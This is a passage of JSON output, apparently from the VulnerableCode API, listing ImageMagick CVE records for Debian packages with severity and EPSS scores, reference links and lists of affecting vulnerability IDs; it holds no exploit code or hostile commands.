"VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-7175" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b32k-mwuv-hfeq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/35870?format=api", "vulnerability_id": "VCID-b8hx-6u4j-b3dc", "summary": "A vulnerability in ImageMagick's handling of PDF was discovered\n possibly allowing code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-29599.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-29599.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-29599", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.9861", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98612", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98615", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98617", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98619", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.9862", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98623", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98624", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98628", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98629", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.6875", "scoring_system": "epss", "scoring_elements": "0.98632", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-29599" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29599", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29599" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907456", "reference_id": "1907456", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907456" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977205", "reference_id": "977205", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977205" }, { "reference_url": "https://security.gentoo.org/glsa/202101-36", "reference_id": "GLSA-202101-36", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202101-36" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:0024", "reference_id": "RHSA-2021:0024", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:0024" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-29599" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b8hx-6u4j-b3dc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81983?format=api", "vulnerability_id": "VCID-bcy4-phg3-w3fq", "summary": "ImageMagick: outside the range of representable values of type 'unsigned long' at MagickCore/statistic.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27776.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27776.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27776", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20288", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20431", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20494", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.2022", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.203", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20359", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20389", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20343", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20285", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20273", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20278", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20277", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20155", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27776" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27776", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27776" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898304", "reference_id": "1898304", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898304" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27776" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bcy4-phg3-w3fq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79583?format=api", "vulnerability_id": "VCID-bky2-hjpj-67ag", "summary": "ImageMagick: heap-use-after-free in RelinquishDCMInfo of dcm.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-1114.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-1114.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-1114", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25843", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25903", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25947", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25714", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25786", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25835", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25842", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25801", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25743", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25746", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25729", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25704", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25649", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-1114" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1114", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1114" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064538", "reference_id": "2064538", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064538" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": 